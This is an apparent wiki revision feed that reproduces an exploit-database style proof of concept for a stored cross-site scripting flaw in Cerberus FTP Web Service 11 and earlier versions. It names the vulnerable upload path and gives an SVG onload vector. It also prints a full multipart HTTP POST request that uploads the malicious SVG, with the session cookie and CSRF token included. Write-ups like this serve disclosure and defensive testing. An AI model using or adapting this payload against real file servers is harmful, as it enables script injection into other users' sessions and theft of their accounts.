https://pwnwiki.com/index.php?action=history&feed=atom&title=Cerberus_FTP_Web_Service_11_XSS%E6%BC%8F%E6%B4%9E
Cerberus FTP Web Service 11 XSS漏洞 - Revision history
2026-04-20T08:32:09Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=Cerberus_FTP_Web_Service_11_XSS%E6%BC%8F%E6%B4%9E&diff=4754&oldid=prev
Pwnwiki: Created page with "==XSS== <pre> # Exploit Title: Cerberus FTP web Service 11 - 'svg' Stored Cross-Site Scripting (XSS) # Date: 08/06/2021 # Exploit Author: Mohammad Hossein Kaviyany # Vendor Ho..."
2021-06-11T09:38:45Z
<p>Created page with "==XSS== <pre> # Exploit Title: Cerberus FTP web Service 11 - 'svg' Stored Cross-Site Scripting (XSS) # Date: 08/06/2021 # Exploit Author: Mohammad Hossein Kaviyany # Vendor Ho..."</p>
<p><b>New page</b></p><div>==XSS==<br />
<pre><br />
# Exploit Title: Cerberus FTP web Service 11 - 'svg' Stored Cross-Site Scripting (XSS)<br />
# Date: 08/06/2021<br />
# Exploit Author: Mohammad Hossein Kaviyany<br />
# Vendor Homepage: www.cerberusftp.com<br />
# Software Link: https://www.cerberusftp.com/download/<br />
# Version:11.0 releases prior to 11.0.4, 10.0 releases prior to 10.0.19, 9.0 and earlier<br />
# Tested on: windows server 2016<br />
------------<br />
About Cerberus FTP Server (From Vendor Site) : <br />
<br />
Cerberus FTP Server is a secure Windows file server with FTP, FTPS, SFTP, HTTPS, <br />
FIPS 140-2 validated, and Active Directory and LDAP authentication.<br />
--------------------------------------------------------<br />
Exploit Detailes :<br />
<br />
This stored XSS bug happens when a user uploads an svg file with the following content :<br />
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(123)"/><br />
<br />
Exploit POC :<br />
<br />
# Vulnerable Path : /file/upload<br />
# Parameter: files (POST)<br />
# Vector: <svg xmlns="http://www.w3.org/2000/svg" onload="alert(123)"/><br />
<br />
#Payload: <br />
<br />
POST /file/upload HTTP/1.1<br />
Host: target.com<br />
Connection: close<br />
Content-Length: 484<br />
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Google Chrome";v="90"<br />
Accept: application/json, text/javascript, */*; q=0.01<br />
X-Requested-With: XMLHttpRequest<br />
sec-ch-ua-mobile: ?0<br />
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36<br />
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAAM6ZtOAsyklo6JG<br />
Origin: https://target.com<br />
Sec-Fetch-Site: same-origin<br />
Sec-Fetch-Mode: cors<br />
Sec-Fetch-Dest: empty<br />
Referer: https://target.com/file/d/home/<br />
Accept-Encoding: gzip, deflate<br />
Accept-Language: en-US,en;q=0.9<br />
Cookie: cftpSID=U02_5UCTumW3vFtt5PrlWwoD4k9ccxW0A87oCM8-jsM<br />
<br />
------WebKitFormBoundaryAAM6ZtOAsyklo6JG<br />
Content-Disposition: form-data; name="cd"<br />
<br />
/home<br />
------WebKitFormBoundaryAAM6ZtOAsyklo6JG<br />
Content-Disposition: form-data; name="csrftoken"<br />
<br />
z-Zlffq0sPaJErxOsMgL4ITcW1x3AuZo3XlZRP5GcKg<br />
------WebKitFormBoundaryAAM6ZtOAsyklo6JG<br />
Content-Disposition: form-data; name="files[]"; filename="file.svg"<br />
Content-Type: image/svg+xml<br />
<br />
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(123)"/><br />
<br />
------WebKitFormBoundaryAAM6ZtOAsyklo6JG--<br />
<br />
--------------------------<br />
</pre></div>
Pwnwiki